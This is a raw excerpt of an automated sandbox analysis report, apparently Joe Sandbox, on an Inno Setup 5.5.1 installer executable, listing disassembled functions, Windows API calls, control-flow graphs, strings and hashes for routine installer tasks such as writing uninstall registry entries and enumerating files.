2735 468655-468681 call 42a054 call 469824 call 4696c4 2705->2735 2706->2683 2707->2683 2712->2713 2725 46848c-46849e call 406ab4 2712->2725 2713->2644 2713->2652 2723->2651 2723->2680 2724->2651 2725->2713 2748 4684a0-4684aa 2725->2748 2734->2705 2740 46868c 2734->2740 2735->2683 2749 46879c-4687bb call 414a3c 2737->2749 2763 468762-468769 2738->2763 2764 46876b-46877a call 414a3c 2738->2764 2746 4685f2-4685f9 2739->2746 2747 4685fb-4685fd 2739->2747 2740->2683 2746->2747 2753 468604-468608 2746->2753 2747->2753 2748->2713 2754 4684ac 2748->2754 2765 4687e5-468808 call 47bb50 call 403450 2749->2765 2766 4687bd-4687e0 call 42a038 call 469984 2749->2766 2753->2662 2753->2663 2754->2713 2763->2764 2769 46877c-46878b call 414a3c 2763->2769 2764->2749 2782 468824-46882d 2765->2782 2783 46880a-468813 2765->2783 2766->2765 2769->2749 2785 468843-468853 call 403494 2782->2785 2786 46882f-468841 call 403684 2782->2786 2783->2782 2784 468815-468822 call 47bcf0 2783->2784 2793 468865-46887c call 414b10 2784->2793 2785->2793 2786->2785 2794 468855-468860 call 403494 2786->2794 2798 4688b2-4688bc call 414a3c 2793->2798 2799 46887e-468885 2793->2799 2794->2793 2805 4688c1-4688e6 call 403400 * 3 2798->2805 2800 468887-468890 2799->2800 2801 468892-46889c call 42b0dc 2799->2801 2800->2801 2803 4688a1-4688b0 call 414a3c 2800->2803 2801->2803 2803->2805
                                                                  APIs
                                                                    • Part of subcall function 00494DD8: GetWindowRect.USER32(00000000), ref: 00494DEE
                                                                  • LoadBitmapA.USER32(00400000,STOPIMAGE), ref: 0046759B
                                                                    • Part of subcall function 0041D6A8: GetObjectA.GDI32(?,00000018,004675B5), ref: 0041D6D3
                                                                    • Part of subcall function 00466FA8: SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 0046704B
                                                                    • Part of subcall function 00466FA8: ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467071
                                                                    • Part of subcall function 00466FA8: ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004670C8
                                                                    • Part of subcall function 00466968: KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467650,00000000,00000000,00000000,0000000C,00000000), ref: 00466980
                                                                    • Part of subcall function 0049505C: MulDiv.KERNEL32(0000000D,?,0000000D), ref: 00495066
                                                                    • Part of subcall function 0042ED30: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDA0
                                                                    • Part of subcall function 0042ED30: SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDBD
                                                                    • Part of subcall function 00494D28: 73A1A570.USER32(00000000,?,?,?), ref: 00494D4A
                                                                    • Part of subcall function 00494D28: SelectObject.GDI32(?,00000000), ref: 00494D70
                                                                    • Part of subcall function 00494D28: 73A1A480.USER32(00000000,?,00494DCE,00494DC7,?,00000000,?,?,?), ref: 00494DC1
                                                                    • Part of subcall function 0049504C: MulDiv.KERNEL32(0000004B,?,00000006), ref: 00495056
                                                                  • GetSystemMenu.USER32(00000000,00000000,0000000C,00000000,00000000,00000000,00000000,0222FAC0,02231820,?,?,02231850,?,?,022318A0,?), ref: 00468225
                                                                  • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00468236
                                                                  • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 0046824E
                                                                    • Part of subcall function 0042A054: SendMessageA.USER32(00000000,0000014E,00000000,00000000), ref: 0042A06A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$AppendExtractIconObject$A480A570AddressAutoBitmapCallbackCompleteDispatcherFileInfoLoadMessageProcRectSelectSendSystemUserWindow
                                                                  • String ID: $(Default)$STOPIMAGE
                                                                  • API String ID: 3271511185-770201673
                                                                  • Opcode ID: 65c14ae30e85822ef60db02fd97b7f4e3efbe6cb128918b96e9feeb284152913
                                                                  • Instruction ID: b2f63b4b9f8df581d735fd8ef5c85857eef1c350e3dafc85bc3b179d47d789c4
                                                                  • Opcode Fuzzy Hash: 65c14ae30e85822ef60db02fd97b7f4e3efbe6cb128918b96e9feeb284152913
                                                                  • Instruction Fuzzy Hash: FCF2D6387005148FCB00EB69D9D5F9973F1BF49304F1582BAE9049B36ADB74AC46CB9A
                                                                  Function 00474D70 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 99fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,00474EDA,?,?,0049C1D0,00000000), ref: 00474DC9
                                                                  • FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,00474EDA,?,?,0049C1D0,00000000), ref: 00474EA6
                                                                  • FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,00474EDA,?,?,0049C1D0,00000000), ref: 00474EB4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Find$File$CloseFirstNext
                                                                  • String ID: unins$unins???.*
                                                                  • API String ID: 3541575487-1009660736
                                                                  • Opcode ID: 93e32e2715b3a8b7847a0fb832790e1c3976f33889ea765eaf668e4b41fda757
                                                                  • Instruction ID: 3bd68598c0aa53c456c144f1316f7d147ab415eaa7c6a73ce12ee5554087e81d
                                                                  • Opcode Fuzzy Hash: 93e32e2715b3a8b7847a0fb832790e1c3976f33889ea765eaf668e4b41fda757
                                                                  • Instruction Fuzzy Hash: 99316370600118AFCB10EF65C881AEEB7A9EF85314F5084F6E50CA73A2DB389F418F19
                                                                  Function 00452A34 Relevance: 3.0, APIs: 2, Instructions: 45fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,00452A97,?,?,-00000001,00000000), ref: 00452A71
                                                                  • GetLastError.KERNEL32(00000000,?,00000000,00452A97,?,?,-00000001,00000000), ref: 00452A79
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorFileFindFirstLast
                                                                  • String ID:
                                                                  • API String ID: 873889042-0
                                                                  • Opcode ID: 7ae0723ade0fcfbd8a40aeca515459a75bb89ca97a3748738d7edfd6ae7cd884
                                                                  • Instruction ID: 4713bb530a1d6cf0c1be7e5c5fdd45c253cc675fccbb574d3c3c9d841926f9e3
                                                                  • Opcode Fuzzy Hash: 7ae0723ade0fcfbd8a40aeca515459a75bb89ca97a3748738d7edfd6ae7cd884
                                                                  • Instruction Fuzzy Hash: 44F0F971A04704AB8B21DFA69D4149EB7ACEB86725B5046BBFC14E3282DAB84E054558
                                                                  Function 0046DF04 Relevance: 3.0, APIs: 2, Instructions: 28comCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetVersion.KERNEL32(00000452,0046DF9A), ref: 0046DF0E
                                                                  • CoCreateInstance.OLE32(00499B84,00000000,00000001,00499B94,?,00000452,0046DF9A), ref: 0046DF2A
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CreateInstanceVersion
                                                                  • String ID:
                                                                  • API String ID: 1462612201-0
                                                                  • Opcode ID: 5a8033094c1a2ccd5f304b9bf5dd1a9c70433978345ec92e95cfd2b7b8fd1860
                                                                  • Instruction ID: 830c4b43a8f201c084d489d1d0538b8be171f1220f730b3634288a605713aaeb
                                                                  • Opcode Fuzzy Hash: 5a8033094c1a2ccd5f304b9bf5dd1a9c70433978345ec92e95cfd2b7b8fd1860
                                                                  • Instruction Fuzzy Hash: 08F0A031B853009EEB14E7A9DC46B4A37C0BB65328F4000BBF044972D2E3AC8890875F
                                                                  Function 00408558 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408623,?,00000000,00408702), ref: 00408576
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: InfoLocale
                                                                  • String ID:
                                                                  • API String ID: 2299586839-0
                                                                  • Opcode ID: 13731be40deedddb1bcfa8ff428b7afeb94bbc36fd170698d9f0ebbe8ddb7d61
                                                                  • Instruction ID: c2e77f62f7768c8d819fe5e4f890f04d0c30465c7a0250885ae4f210fddfc08b
                                                                  • Opcode Fuzzy Hash: 13731be40deedddb1bcfa8ff428b7afeb94bbc36fd170698d9f0ebbe8ddb7d61
                                                                  • Instruction Fuzzy Hash: 9BE0927170021466D311A96A9C86AEAB35C975C314F00427FBA84E73C2EDB89E4146A9
                                                                  Function 00423B7C Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • NtdllDefWindowProc_A.USER32(?,?,?,?,?,00424149,?,00000000,00424154), ref: 00423BA6
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: NtdllProc_Window
                                                                  • String ID:
                                                                  • API String ID: 4255912815-0
                                                                  • Opcode ID: f802b11f0c681854f79c5f1da5c1baf03ca951e6abaa2e26ef8ced90cdb9169e
                                                                  • Instruction ID: a748582893d7571d6ac8bdbe819d0a8fbf5f36db2d3505b6f19a51c7a0bbae16
                                                                  • Opcode Fuzzy Hash: f802b11f0c681854f79c5f1da5c1baf03ca951e6abaa2e26ef8ced90cdb9169e
                                                                  • Instruction Fuzzy Hash: 47F0B979205608AF8B40DF99C588D4ABBE8AB4C260B058195B988CB321C234ED808F90
                                                                  Function 00455570 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: NameUser
                                                                  • String ID:
                                                                  • API String ID: 2645101109-0
                                                                  • Opcode ID: 1f1a34a7eb901b06f0a61d7cce650584f8c9fe2765f86e1b2240f6bc1b6117e3
                                                                  • Instruction ID: 76bfcf8d2b29e22e6d76dcded3dafddf5190573ba102c834aba1eed314c6e9aa
                                                                  • Opcode Fuzzy Hash: 1f1a34a7eb901b06f0a61d7cce650584f8c9fe2765f86e1b2240f6bc1b6117e3
                                                                  • Instruction Fuzzy Hash: C9D0C27130460467C700AA68DC825AA358E8B84306F00483E3CC5DA2C3FABDDA485756
                                                                  Function 0042F518 Relevance: 1.5, APIs: 1, Instructions: 17nativeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042F534
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: NtdllProc_Window
                                                                  • String ID:
                                                                  • API String ID: 4255912815-0
                                                                  • Opcode ID: 333668ea2a957bd6a9fe502da343e78d2fcb082c63b96445e07994a194d2f0c0
                                                                  • Instruction ID: dfc14921be52f7ae21963fbc3fbcd64f7f6a072f88f97ccbdbccca1c2d2fc057
                                                                  • Opcode Fuzzy Hash: 333668ea2a957bd6a9fe502da343e78d2fcb082c63b96445e07994a194d2f0c0
                                                                  • Instruction Fuzzy Hash: 9FD09E7220011DBB9B00DE99E840C6B73ADAB88710BD09926F945C7642D634ED9197A5
                                                                  Function 0046EE78 Relevance: 72.2, APIs: 1, Strings: 40, Instructions: 500registryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 406 46ee78-46eeaa 407 46eec7 406->407 408 46eeac-46eeb3 406->408 411 46eece-46ef06 call 403634 call 403738 call 42deb8 407->411 409 46eeb5-46eebc 408->409 410 46eebe-46eec5 408->410 409->407 409->410 410->411 418 46ef21-46ef4a call 403738 call 42dddc 411->418 419 46ef08-46ef1c call 403738 call 42deb8 411->419 427 46ef4c-46ef55 call 46eb48 418->427 428 46ef5a-46ef83 call 46ec64 418->428 419->418 427->428 432 46ef95-46ef98 call 403400 428->432 433 46ef85-46ef93 call 403494 428->433 437 46ef9d-46efe8 call 46ec64 call 42c3f4 call 46ecac call 46ec64 432->437 433->437 446 46effe-46f01f call 455570 call 46ec64 437->446 447 46efea-46effd call 46ecd4 437->447 454 46f075-46f07c 446->454 455 46f021-46f074 call 46ec64 call 4313fc call 46ec64 call 4313fc call 46ec64 446->455 447->446 456 46f07e-46f0bb call 4313fc call 46ec64 call 4313fc call 46ec64 454->456 457 46f0bc-46f0c3 454->457 455->454 456->457 461 46f104-46f129 call 40b434 call 46ec64 457->461 462 46f0c5-46f103 call 46ec64 * 3 457->462 481 46f12b-46f136 call 47bb50 461->481 482 46f138-46f141 call 403494 461->482 462->461 492 46f146-46f151 call 478898 481->492 482->492 496 46f153-46f158 492->496 497 46f15a 492->497 498 46f15f-46f329 call 403778 call 46ec64 call 47bb50 call 46ecac call 403494 call 40357c * 2 call 46ec64 call 403494 call 40357c * 2 call 46ec64 call 47bb50 call 46ecac call 47bb50 call 46ecac call 47bb50 call 46ecac call 47bb50 call 46ecac call 47bb50 call 46ecac call 47bb50 call 46ecac call 47bb50 call 46ecac call 47bb50 call 46ecac call 47bb50 call 46ecac call 47bb50 496->498 497->498 561 46f33f-46f34d call 46ecd4 498->561 562 46f32b-46f33d call 46ec64 498->562 566 46f352 561->566 567 46f353-46f39c call 46ecd4 call 46ed08 call 46ec64 call 47bb50 call 46ed6c 562->567 566->567 578 46f3c2-46f3cf 567->578 579 46f39e-46f3c1 call 46ecd4 * 2 567->579 581 46f3d5-46f3dc 578->581 582 46f49e-46f4a5 578->582 579->578 586 46f3de-46f3e5 581->586 587 46f449-46f458 581->587 583 46f4a7-46f4dd call 4941f8 582->583 584 46f4ff-46f515 RegCloseKey 582->584 583->584 586->587 591 46f3e7-46f40b call 430bc4 586->591 590 46f45b-46f468 587->590 594 46f47f-46f498 call 430c00 call 46ecd4 590->594 595 46f46a-46f477 590->595 591->590 601 46f40d-46f40e 591->601 604 46f49d 594->604 595->594 597 46f479-46f47d 595->597 597->582 597->594 603 46f410-46f436 call 40b434 call 4790c4 601->603 609 46f443-46f445 603->609 610 46f438-46f43e call 430bc4 603->610 604->582 609->603 612 46f447 609->612 610->609 612->590
                                                                  APIs
                                                                    • Part of subcall function 0046EC64: RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,r_G,?,0049C1D0,?,0046EF7B,?,00000000,0046F516,?,_is1), ref: 0046EC87
                                                                    • Part of subcall function 0046ECD4: RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F352,?,?,00000000,0046F516,?,_is1,?), ref: 0046ECE7
                                                                  • RegCloseKey.ADVAPI32(?,0046F51D,?,_is1,?,Software\Microsoft\Windows\CurrentVersion\Uninstall\,00000000,0046F568,?,?,0049C1D0,00000000), ref: 0046F510
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Value$Close
                                                                  • String ID: " /SILENT$5.5.1 (a)$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$EstimatedSize$HelpLink$HelpTelephone$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: Language$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: Setup Version$Inno Setup: User$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$InstallDate$InstallLocation$MajorVersion$MinorVersion$ModifyPath$NoModify$NoRepair$Publisher$QuietUninstallString$Readme$RegisterPreviousData$Software\Microsoft\Windows\CurrentVersion\Uninstall\$URLInfoAbout$URLUpdateInfo$UninstallString$_is1
                                                                  • API String ID: 3391052094-213252641
                                                                  • Opcode ID: db2c8a7a7111b7a2256de2528cb94e5858c2f33c6448f5c94e9fc589d623ae97
                                                                  • Instruction ID: b1500e3f1927c4d0668730226bdd95c12c24136f653289305a03eef3c2fa698f
                                                                  • Opcode Fuzzy Hash: db2c8a7a7111b7a2256de2528cb94e5858c2f33c6448f5c94e9fc589d623ae97
                                                                  • Instruction Fuzzy Hash: 40125334A001089BDB04EF56E991ADE73F5FB48304F60807BE8506B765EB78BD45CB5A
                                                                  Function 00491D44 Relevance: 56.4, APIs: 16, Strings: 16, Instructions: 431sleepCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1027 491d44-491d78 call 403684 1030 491d7a-491d89 call 446f94 Sleep 1027->1030 1031 491d8e-491d9b call 403684 1027->1031 1036 49221e-492238 call 403420 1030->1036 1037 491dca-491dd7 call 403684 1031->1037 1038 491d9d-491dc0 call 446ff0 call 403738 FindWindowA call 447270 1031->1038 1046 491dd9-491e01 call 446ff0 call 403738 FindWindowA call 447270 1037->1046 1047 491e06-491e13 call 403684 1037->1047 1057 491dc5 1038->1057 1046->1036 1055 491e5c-491e69 call 403684 1047->1055 1056 491e15-491e57 call 446f94 * 4 SendMessageA call 447270 1047->1056 1065 491eb8-491ec5 call 403684 1055->1065 1066 491e6b-491eb3 call 446f94 * 4 PostMessageA call 4470c8 1055->1066 1056->1036 1057->1036 1074 491f14-491f21 call 403684 1065->1074 1075 491ec7-491f0f call 446f94 * 4 SendNotifyMessageA call 4470c8 1065->1075 1066->1036 1087 491f4e-491f5b call 403684 1074->1087 1088 491f23-491f49 call 446ff0 call 403738 RegisterClipboardFormatA call 447270 1074->1088 1075->1036 1103 491f5d-491f97 call 446f94 * 3 SendMessageA call 447270 1087->1103 1104 491f9c-491fa9 call 403684 1087->1104 1088->1036 1103->1036 1116 491fab-491feb call 446f94 * 3 PostMessageA call 4470c8 1104->1116 1117 491ff0-491ffd call 403684 1104->1117 1116->1036 1127 491fff-49203f call 446f94 * 3 SendNotifyMessageA call 4470c8 1117->1127 1128 492044-492051 call 403684 1117->1128 1127->1036 1138 492053-492071 call 446ff0 call 42e38c 1128->1138 1139 4920a6-4920b3 call 403684 1128->1139 1159 492083-492091 GetLastError call 447270 1138->1159 1160 492073-492081 call 447270 1138->1160 1150 49212d-49213a call 403684 1139->1150 1151 4920b5-4920e1 call 446ff0 call 403738 call 446f94 GetProcAddress 1139->1151 1165 49213c-49215d call 446f94 FreeLibrary call 4470c8 1150->1165 1166 492162-49216f call 403684 1150->1166 1184 49211d-492128 call 4470c8 1151->1184 1185 4920e3-492118 call 446f94 * 2 call 447270 call 4470c8 1151->1185 1171 492096-4920a1 call 447270 1159->1171 1160->1171 1165->1036 1177 492171-49218f call 446ff0 call 403738 CreateMutexA 1166->1177 1178 492194-4921a1 call 403684 1166->1178 1171->1036 1177->1036 1193 4921a3-4921d5 call 48c174 call 403574 call 403738 OemToCharBuffA call 48c18c 1178->1193 1194 4921d7-4921e4 call 403684 1178->1194 1184->1036 1185->1036 1193->1036 1203 49221a 1194->1203 1204 4921e6-492218 call 48c174 call 403574 call 403738 CharToOemBuffA call 48c18c 1194->1204 1203->1036 1204->1036
                                                                  APIs
                                                                  • Sleep.KERNEL32(00000000,00000000,00492239,?,?,?,?,00000000,00000000,00000000), ref: 00491D84
                                                                  • FindWindowA.USER32(00000000,00000000), ref: 00491DB5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: FindSleepWindow
                                                                  • String ID: CALLDLLPROC$CHARTOOEMBUFF$CREATEMUTEX$FINDWINDOWBYCLASSNAME$FINDWINDOWBYWINDOWNAME$FREEDLL$LOADDLL$OEMTOCHARBUFF$POSTBROADCASTMESSAGE$POSTMESSAGE$REGISTERWINDOWMESSAGE$SENDBROADCASTMESSAGE$SENDBROADCASTNOTIFYMESSAGE$SENDMESSAGE$SENDNOTIFYMESSAGE$SLEEP
                                                                  • API String ID: 3078808852-3310373309
                                                                  • Opcode ID: 58a090b98d9e381863c78da40cb00c9745695e2105e43b1ea83f897cb27ba63d
                                                                  • Instruction ID: dc8cd37179c6c7efec8ae072485b7dd58185b77a9baa1073e2e80a3326dd0ce5
                                                                  • Opcode Fuzzy Hash: 58a090b98d9e381863c78da40cb00c9745695e2105e43b1ea83f897cb27ba63d
                                                                  • Instruction Fuzzy Hash: 6CC19360B043406BDB24BF7E9D4291A59999F98708711897FB846EB38BCE7CDC0E439D
                                                                  Function 00483038 Relevance: 26.3, APIs: 9, Strings: 6, Instructions: 68libraryloaderCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1589 483038-48305d GetModuleHandleA GetProcAddress 1590 48305f-483075 GetNativeSystemInfo GetProcAddress 1589->1590 1591 4830c4-4830c9 GetSystemInfo 1589->1591 1592 4830ce-4830d7 1590->1592 1593 483077-483082 GetCurrentProcess 1590->1593 1591->1592 1594 4830d9-4830dd 1592->1594 1595 4830e7-4830ee 1592->1595 1593->1592 1602 483084-483088 1593->1602 1596 4830df-4830e3 1594->1596 1597 4830f0-4830f7 1594->1597 1598 483109-48310e 1595->1598 1600 4830f9-483100 1596->1600 1601 4830e5-483102 1596->1601 1597->1598 1600->1598 1601->1598 1602->1592 1603 48308a-483091 call 4526f0 1602->1603 1603->1592 1607 483093-4830a0 GetProcAddress 1603->1607 1607->1592 1608 4830a2-4830b9 GetModuleHandleA GetProcAddress 1607->1608 1608->1592 1609 4830bb-4830c2 1608->1609 1609->1592
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00483049
                                                                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00483056
                                                                  • GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483064
                                                                  • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0048306C
                                                                  • GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00483078
